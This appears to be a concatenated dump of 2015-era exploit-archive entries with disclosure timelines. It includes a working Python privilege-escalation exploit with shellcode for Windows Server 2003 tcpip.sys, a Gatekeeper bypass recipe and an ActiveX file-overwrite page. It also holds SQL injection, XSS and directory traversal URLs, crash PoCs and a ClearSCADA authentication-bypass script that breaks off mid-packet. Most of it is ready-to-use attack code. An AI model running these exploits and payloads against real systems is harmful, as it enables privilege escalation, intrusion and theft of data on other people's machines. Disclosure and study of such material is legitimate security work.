if (bind(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("bind");
goto out;
}
if (listen(fd, 1) < 0) {
perror("listen");
goto out;
}
while (1) {
flags = 0;
memset(&addr, 0, sizeof(struct sockaddr_in));
from_len = (socklen_t)sizeof(struct sockaddr_in);
memset(&sinfo, 0, sizeof(struct sctp_sndrcvinfo));
n = sctp_recvmsg(fd, (void *)buffer, BUFFER_SIZE, (struct sockaddr *)&addr, &from_len, &sinfo, &flags);
if (flags & MSG_NOTIFICATION) {
printf("Notification received.\n");
} else {
printf("Msg of length %d received from %s:%u on stream %d, PPID %d.\n", n, inet_ntoa(addr.sin_addr), ntohs(addr.sin_port),sinfo.sinfo_stream, ntohl(sinfo.sinfo_ppid));
}
}
out:
if (close(fd) < 0) {
perror("close");
}
return (0);
}
-----/
9. *Report Timeline*
. 2015-01-15:
Initial notification sent to FreeBSD. Publication date set to Feb 16, 2015.
. 2015-01-15:
FreeBSD confirms reception of the report and requests the draft version of the advisory. They clarify that they usually aim for Tuesday releases depending on the severity of the problem.
. 2015-01-15:
Core Security sends a draft version of the advisory to the vendor and requests to be informed once they finish reviewing the vulnerabilities.
. 2015-01-26:
Core Security requests a status report regarding their review of the vulnerabilities and the estimated publication date.
. 2015-01-26:
FreeBSD confirms the bugs, but informs us that they'll only publish a security advisory for the SCTP Socket SCTP_SS_VALUE Memory Corruption and Kernel Memory Disclosure vulnerabilities. For the "vt Driver VT_WAITACTIVE Sign Conversion Vulnerability" they will commit a normal change and then release an "Errata Notice" informing the fix. They set the publication date for 27th January, 2015.
. 2015-01-26:
Core Security informs that understands their position regarding the vt Driver VT_WAITACTIVE Sign Conversion issue, but we will nevertheless publish thew bug in the advisory because we consider it a vulnerability. We accepted their offer of sharing CVE IDs.
. 2015-01-26:
FreeBSD confirms they have available CVE IDs and ask if we want to use IDs from 2014 or 2015.
. 2015-01-27:
FreeBSD informs us that after going through their mail archive they found out that the same issue was reported by Google and that they missed it. They inform us that they will use only one CVE ID for the two SCTP issues because they state they are of the same nature.
. 2015-01-27:
Core Security informs that will assign a the CVE ID CVE-2014-0998 to the vt(4) vulnerability and we requested the date and time they plan to release the fix and advisory.
. 2015-01-27:
FreeBSD informs they will publish the fix and advisory today.
. 2015-01-27:
Advisory CORE-2015-0003 published.
10. *References*
[1] https://www.freebsd.org/releases/10.1R/relnotes.html#new
[2] https://www.freebsd.org/cgi/man.cgi?query=vt&sektion=4
[3] https://wiki.freebsd.org/Newcons
[4] https://www.freebsd.org/cgi/man.cgi?query=sctp&sektion=4
[5] http://www.bsdcan.org/2008/schedule/attachments/44_bsdcan_sctp.pdf
[6] https://security.FreeBSD.org/advisories/FreeBSD-SA-15:02.kmem.asc
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2015 Core Security and (c) 2015 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security advisories
team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
"""
KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-001
Publication Date: 2015.01.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt
1. Vulnerability Details
Affected Vendor: Microsoft
Affected Product: TCP/IP Protocol Driver
Affected Version: 5.2.3790.4573
Platform: Microsoft Windows Server 2003 Service Pack 2
Architecture: x86, x64, Itanium
Impact: Privilege Escalation
Attack vector: IOCTL
CVE-ID: CVE-2014-4076
2. Vulnerability Description
The tcpip.sys driver fails to sufficiently validate memory
objects used during the processing of a user-provided IOCTL.
3. Technical Description
By crafting an input buffer that will be passed to the Tcp
device through the NtDeviceIoControlFile() function, it
is possible to trigger a vulnerability that would allow an
attacker to elevate privileges.
This vulnerability was discovered while fuzzing the tcpip.sys
driver. A collection of IOCTLs that could be targeted was
obtained and subsequently fuzzed. During this process, one of
the crashes obtained originated from the IOCTL 0x00120028.
This was performed on an x86 installation of Windows Server
2003, Service Pack 2.
ErrCode = 00000000
eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270
eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
tcpip!SetAddrOptions+0x1d:
f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=????????
A second chance exception has occurred during a mov
instruction. This instruction is attempting to copy a pointer
value from an un-allocated address space. Since no pointer
can be found, an exception is generated.
Let's begin by reviewing the call stack:
kd> kv
*** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr Args to Child
f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo])
f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo])
f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo])
f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo])
f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo])
f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo])
f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo])
f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo])
f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo])
The nt!NtDeviceIoControlFile() function was called, creating
a chain of subsequent function calls that eventually led to
the tcpip!SetAddrOptions() function being called.
By de-constructing the call to nt!NtDeviceIoControlFile() we
can derive all required information to re-create this exception.
0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a
eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
nt!NtDeviceIoControlFile+0x2a:
808e912e 5d pop ebp
kd> db [ebp+2C] L?0x4
b940dd60 00 00 00 00 ....
kd> db [ebp+28] L?0x4
b940dd5c 00 00 00 00 ....
kd> db [ebp+24] L?0x4
b940dd58 20 00 00 00 ...
kd> db [ebp+20] L?0x4
b940dd54 00 11 00 00 ....
kd> db [ebp+1c] L?0x4
b940dd50 28 00 12 00 (...
kd> db [ebp+18] L?0x4
b940dd4c 58 4f bd 00 XO..
kd> db [ebp+14] L?0x4
b940dd48 00 00 00 00 ....
kd> db [ebp+10] L?0x4
b940dd44 00 00 00 00 ....
kd> db [ebp+0c] L?0x4
b940dd40 00 00 00 00 ....
kd> db [ebp+8] L?0x4
b940dd3c b8 06 00 00 ....
The inputBuffer for this call references memory at 0x1000 with
a length of 0x20.
kd> db 0x1100 L?0x20
00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................
00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "...............
After review of the tcpip.sys driver, some memory trickery
was created to control the code flow until the instruction
pointer could be controlled in a way that would be beneficial
to an attacker.
kd> db 0x28 L?0x11
00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............
00000038 01
eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
0000002a ff ???
Since the instruction pointer now contains 0x0000002a,
exploitation becomes trivial. Merely allocating the desired
payload for execution at this memory address will allow for
unprivileged users to run their payload within a privileged
process.
4. Mitigation and Remediation Recommendation
The vendor has issued a patch for this
vulnerability, the details of which are presented
in the vendor's public acknowledgment MS14-070
(https://technet.microsoft.com/library/security/MS14-070).
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft requests PoC.
2014.04.29 - KoreLogic resends PoC from the initial contact
email.
2014.04.29 - Microsoft acknowledges receipt of vulnerability
report.
2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to
investigate the vulnerability.
2014.04.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.05.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.06.11 - KoreLogic informs Microsoft that 30 business days
have passed since vendor acknowledgment of the
initial report. KoreLogic requests CVE number for
the vulnerability, if there is one. KoreLogic
also requests vendor's public identifier for the
vulnerability along with the expected disclosure
date.
2014.06.24 - KoreLogic informs Microsoft that no response was
received following the 06.11.14 email. KoreLogic
requests CVE number for the vulnerability, if
there is one. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.06.24 - Microsoft replies to KoreLogic that they have
reproduced the vulnerability and are determining
how to proceed with the supplied information.
They are not able to provide a CVE or an expected
disclosure date.
2014.07.02 - 45 business days have elapsed since Microsoft
acknowledged receipt of the vulnerability report
and PoC.
2014.07.17 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.08.18 - Microsoft notifies KoreLogic that they have a CVE
but are not willing to share it with KoreLogic at
this time.
2014.09.08 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.09.11 - Microsoft responds saying that the vulnerability
is expected to be disclosed in "a Fall release"
and that "it is currently looking good for
October." Does not provide CVE.
2014.09.24 - Microsoft informs KoreLogic that there was a
packaging issue and that the patch will be pushed
to November.
2014.11.03 - Microsoft confirms the patch will ship in November.
2014.11.11 - Vulnerability publicly disclosed by Microsoft as
issue MS14-070 with CVE-2014-4076.
2015.01.28 - KoreLogic releases advisory.
7. Exploit
"""
#!/usr/bin/python2
#
# KL-001-2015-001 / MS14-070 / CVE-2014-4076
# Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation
# Matt Bergin @ KoreLogic / Level @ Smash the Stack
# shout out to bla
#
from optparse import OptionParser
from subprocess import Popen
from os.path import exists
from struct import pack
from time import sleep
from ctypes import *
from sys import exit
CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory =
windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory
DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
def spawn_process(path):
process = Popen([path],shell=True)
pid = process.pid
return
def main():
print "CVE-2014-4076 x86 exploit, Level\n"
global pid, process
parser = OptionParser()
parser.add_option("--path",dest="path",help="path of process to start and elevate")
parser.add_option("--pid",dest="pid",help="pid of running process to elevate")
o,a = parser.parse_args()
if (o.path == None and o.pid == None):
print "[!] no path or pid set"
exit(1)
else:
if (o.path != None):
if (exists(o.path) != True):
print "[!] path does not exist"
exit(1)
else:
Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start()
if (o.pid != None):
try:
pid = int(o.pid)
except:
print "[!] could not convert PID to an interger."
exit(1)
while True:
if ("pid" not in globals()):
sleep(1)
else:
print "[+] caught attacker cmd at %s, elevating now" % (pid)
break
buf =
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
sc =
"\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"
sc = sc.replace("\x41\x41\x41\x41",pack('<L',pid))
sc = sc.replace("\x11\x11\x11\x11","\x39\xff\xa2\xba")
sc = sc.replace("\x22\x22\x22\x22","\x00\x00\x00\x00")
handle = CreateFileA("\\\\.\\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[!] could not open handle into the Tcp device"
exit(1)
print "[+] allocating memory"
ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40)
if (ret_one != 0):
print "[!] could not allocate memory..."
exit(1)
print "[+] writing relevant memory..."
ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0)))
ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0)))
ret_four = WriteProcessMemory(-1, 0x1100, buf, len(buf), byref(c_int(0)))
ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0)))
ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0)))
print "[+] attack setup done, crane kick!"
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0)
CloseHandle(handle)
exit(0)
if __name__=="__main__":
main()
"""
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
"""
# Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC
# Google Dork: [none]
# Date: 01/28/2015
# Exploit Author: bonze
# Email: dungvtr@gmail.com
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download)
# Version: 1.1
# Tested on: Windows 7 SP1 EN
# CVE : [none]
# Note:
# Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking
# Please tell me if you have any ideal
#013E8012 |. 68 00020000 PUSH 200 ; /WideBufSize = 200 (512.)
#013E8017 |. 8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C] ; |
#013E801E |. 51 PUSH ECX ; |WideCharBuf
#013E801F |. 52 PUSH EDX ; |StringSize
#013E8020 |. 50 PUSH EAX ; |StringToMap
#013E8021 |. 6A 00 PUSH 0 ; |Options
#013E8023 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP
#013E8025 |. FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar
#013E802B |. 8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208]
# At Offset: 327-> overwrite nSEH
# At Offset: 329-> overwrite SEH
# badchar = 0x22
buff2 = "A" * 325
buff2+= "CC" # nSEH
buff2+= "BB" # SEH
crash2 = "<config>\n"
crash2 += " <current Dat=\"1422420474\" />\n"
crash2 += " <Dat Txt=\""+buff2+"\" />\n"
crash2 += "</config>\n"
# Copy file update.xml to UniPDF Application Folder and run UniPDF.exe
file = open("update.xml","w")
file.write(crash2)
file.close()
print "UniPDF v1.1 Crash PoC by bonze at FPT-IS"
print "Email: dungvtr@gmail.com"
print "File Created"
# Exploit Title: OS X Gatekeeper bypass Vulnerability
# Date: 01-27-2015
# Exploit Author: Amplia Security Research
# Vendor Homepage: www.apple.com
# Version: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# Tested on: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# CVE : CVE-2014-8826
Advisory URL :
http://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html
Gatekeeper is a feature available in OS X Lion v10.7.5 and later
versions of OS X.
Gatekeeper performs checks on files and applications downloaded from the
Internet to prevent execution of supposedly malicious and
untrusted/unsigned code.
Gatekeeper provides three different settings:
- Mac App Store (Only apps that came from the Mac App Store can open)
- Mac App Store and identified developers (Only apps that came from the
Mac App Store and identified developers using Gatekeeper can open)
- Anywhere
The default setting is "Mac App Store and identified developers".
This setting prevents execution of any code that was not downloaded from
the Mac App Store and that was not digitally signed by a Developer ID
registered with Apple.
For example, If the user downloads an application from an untrusted
source and double-clicks on the application to execute it, OS X
Gatekeeper will prevent its execution with the following warning message:
"<AppName> can't be opened because it is from an unidentified developer."
(For more information on OS X Gatekeeper, see
http://support.apple.com/kb/ht5290)
We found an attacker can bypass OS X Gatekeeper protections and execute
unsigned malicious code downloaded by the user, even if OS X Gatekeeper
is configured to only allow execution of applications downloaded from
the Mac App Store (the highest security setting).
The exploitation technique is trivial and requires Java to be installed
on the victim's machine.
OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and
class (.class) files, but this verification can be bypassed.
For example:
- Create a JAR file containing the code to be executed
For example,
File AmpliaTest.java:
public class AmpliaTest {
public static void main(String[] args) {
try { Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY");
} catch(Exception e) { }
}
}
(This is just an example, of course, arbitrary code can be executed)
$ javac AmpliaTest.java
Be sure to compile the code for a version of Java lower than or equal to
the one available on the target (for example, javac -target 1.6 -source
1.6 AmpliaTest.java; and the compiled code will work on Java versions >=
1.6) .
$ echo "main-class: AmpliaTest" > Manifest
$ jar cmf Manifest UnsignedCode.jar AmpliaTest.class
- Create a .DMG disk image
For example:
$ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg
- Mount AmpliaTest.dmg
- Rename UnsignedCode.jar to UnsignedCode (just remove the extension)
- Copy UnsignedCode to the AmpliaSecurity volume
- Unmount AmpliaTest.dmg
- Host the file AmpliaTest.dmg on a web server
- Download AmpliaTest.dmg using Safari and open it
- Double-Click on 'UnsignedCode' and the code will be executed bypassing
OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY).
(Perform the same steps but without removing the .jar extension to
UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file)
Because the file 'UnsignedCode' has no extension, Finder will display a
blank page icon; the Java/JAR icon will not be displayed. The user does
not know he is double-clicking on a JAR file and the file does not look
particularly suspicious. Also, since the unsigned code is distributed
inside a disk image (.DMG) file, there are many things the attacker can
do to gain the trust of the user (include other files, use Finder
background images, etc).
################################################################################################
# #
# ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-28
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/firewall/
# Demo Link: http://demo.fwanalyzer.com/
#Affected version: <= Build Version : 8.0
About ManageEngine Firewall Analyzer (From Vendor Site) :
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software
that helps network administrators to centrally collect, archive, analyze
their security device logs and generate forensic reports out of it.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
source: https://www.securityfocus.com/bid/48639/info
ICMusic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ICMusic 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6--
source: https://www.securityfocus.com/bid/48637/info
Prontus CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/prontus_fonasa/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/prontus_senado/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/p1_rector/antialone.html?page=javascript:alert%28/XSS/%29;//
source: https://www.securityfocus.com/bid/48621/info
The 'com_voj' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/ [PATH]/index.php?option=com_voj&task=viewCode&id=215 and 1=1
source: https://www.securityfocus.com/bid/48582/info
Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.
An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected.
<html>
<object classid='clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\File_name_to_rewrite_or_create"
arg2=1
arg3="New_File_Content"
target.Text=arg3
target.SelStart=0
target.SelEnd=Len(arg3)
target.SaveToFIle arg1,arg2
End Sub
</script>
</html>
source: https://www.securityfocus.com/bid/48564/info
Classified Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/
source: https://www.securityfocus.com/bid/48561/info
eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/npages/back.asp?id=[SQL]
source: https://www.securityfocus.com/bid/48560/info
The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities.
An attacker may leverage these issues to obtain potentially sensitive information, cause vulnerable devices to crash (resulting in a denial-of-service condition), or bypass certain security restrictions by sending a specially crafted HTTP POST request.
POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit
POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
submit=Save
#!/usr/bin/python
# cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# exploited by triggering an exception in dbserver.exe and taking advantage
# of the way the program handles it.
#
# When an exception in occurs, ClearSCADA enters "Safe Mode". This exposes
# it's diagnostic functions to remote users without requiring a valid login
# as it would normally. A remote attacker could view senstive information
# and possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#
import sys
import socket
import httplib
import urllib
from time import sleep
pkt_1=(
"\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
"\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
"\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
"\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
"\x08\x00\x00\x00"
)
pkt_2=(
"\x00\x00\x00\x00"
"\x26\x00\x00\x00"
"\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00"
"\x74\x00\x73\x00\x00\x00"
)
pkt_3=( # "Exception Occured"
"\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00"
"\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00"
"\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00"
"\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00"
"\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00"
"\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00" # last w0rd
"\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61"
"\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11"
"\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52"
"\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61"
"\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76"
"\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75"
"\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x12\x00\x00\x00\x43"
"\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
